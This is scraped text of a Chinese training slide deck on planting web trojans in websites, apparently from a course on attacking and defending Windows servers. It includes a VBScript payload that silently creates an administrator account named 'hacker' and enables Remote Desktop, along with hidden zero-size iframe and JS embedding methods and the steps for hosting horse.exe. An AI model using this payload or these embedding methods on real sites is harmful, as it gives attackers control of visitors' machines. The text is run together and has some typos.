Windows服务器系统攻防-ppt04-v1.0.pptVIP

N b n e t NBNET 6.0 */21 教员在此通过动画讲解网马的运行过程。 * 将木马网页保存为user.htm 该网马的作用是在用户的计算机上创建一个具有管理员权限的名为 hacker的用户，打开系统的远程桌面连接，用来判断网马是否被成功调用 将该文件上传到网站空间后，访问地址为：/user.htm，需要先测试其能否运行成功。 * Frameborder:框架边框的显示方式，可以取值为“0”或“1”，“0”表示无边框，“1”表示有边框 长和宽都被设置为“0”，并且边框被设置为“不显示”，很难会被用户察觉，非常具有隐蔽性 * 教员在此进行实际演示。 由于该网页木马使用VBS脚本语言制作而成，需要通过IE的ActiveX控件才可以执行 在Windows 7的客户机上设置IE安全级别，启用“对未标记为可安全执行脚本的ActiveX控件初始化并执行脚本” 打开“本地用户和组”，可以看到系统中出现了一个自动创建了一个名为 hacker 的具有管理员权限的用户 打开系统属性，可以看到远程桌面已被开启 测试成功后，将用户 hacker 删除，关闭远程桌面，以便进行后续步骤 在该机器上会自动创建一个具有管理员权限的名为 hacker 的用户，远程桌面连接也会被打开 * 教员在此详细讲解代码参数，重点讲解JS文件调用方式。 * 教员在此进行演示，JS文件加密变形方式可以不再演示。 * 教员需要提醒学员，即使新窗口即使其长和宽都设置为“0”，也不可以被隐藏。 Window.open()：弹出新窗口； （第一个）：超链接地址 （第二个）：表示的是弹出新窗口的名称，可以为空 Toolbar：是否显示工具栏，“no”为不显示，“yes”为显示 Location：是否显示地址栏，“no”为不显示，“yes”为显示 Directories：是否显示前进、后退、刷新按钮，“no”为不显示，“yes”为显示 Status：是否显示状态栏内的信息，“no”为不显示，“yes”为显示 Menubar：是否显示菜单栏，“no”为不显示，“yes”为显示 Scrollbars：是否显示滚动栏，“no”为不显示，“yes”为显示 Width：弹出新窗口的宽度 Height：弹出锌矿口的高度 * Window.location只能在一个网站中打开该网站的页面。 * 第四章 网页挂马 —— 理论部分 常见的木马有哪几种？ 简述如何使木马开机自启动？ 常见的密码破解方式有哪些？ 课程回顾 了解挂马与网马的概念 了解网马的运行原理 了解常用的网页挂马方式 技能展示 本章结构 网页挂马 Iframe框架嵌入式挂马 JS文件调用挂马 网页木马运行原理 网页挂马介绍 网页挂马实现方式 挂马与网马 JavaScript脚本挂马 Body挂马 网页挂马介绍 挂马 将自己编写的网页木马嵌入到其网站的页面 网马 将木马和网页结合在一起 网页挂马介绍1-1 网页木马运行原理 最初的网页木马 利用IE浏览器的ActiveX控件 会出现ActiveX控件下载提示 新型的网页木马 利用浏览器的漏洞 运行时没有任何提示 网页木马运行原理1-1 网页挂马步骤 申请网站空间 /xxx 上传木马程序 木马程序访问地址： /horse.exe 使用网页木马生成器生成网马 网马地址： /horse.htm 进行挂马 将生成后的网马地址嵌入到其他网站的正常页面 /default.htm 网页挂马步骤 用户 被入侵站点 /default.htm 木马网址 /horse.htm 网马地址 /horse.exe 常用的挂马方式 Iframe框架嵌入式挂马 JS文件调用挂马 JS脚本挂马 Body挂马 网页挂马实现方式 网马 网马地址：/user.htm 创建名为hacker的管理员账户，开启远程桌面 网马制作 html head titlehello/title This page will create a new user:hacker! script language=vbs dim wshell set wshell = createobject(wscript.Shell) wshell.run cmd /c net user hacker benet /add ,vbhide wshell.run cmd /c net localgroup administrators hacker /add ,vbhide …… /script /head body 木马语句 iframe框架嵌入式挂马 利用iframe语句将网页木马嵌入到正常页面中 网马页面的长和宽设置为“0” iframe语句 参数解释 src：网马链接地址 width:框架的宽度 he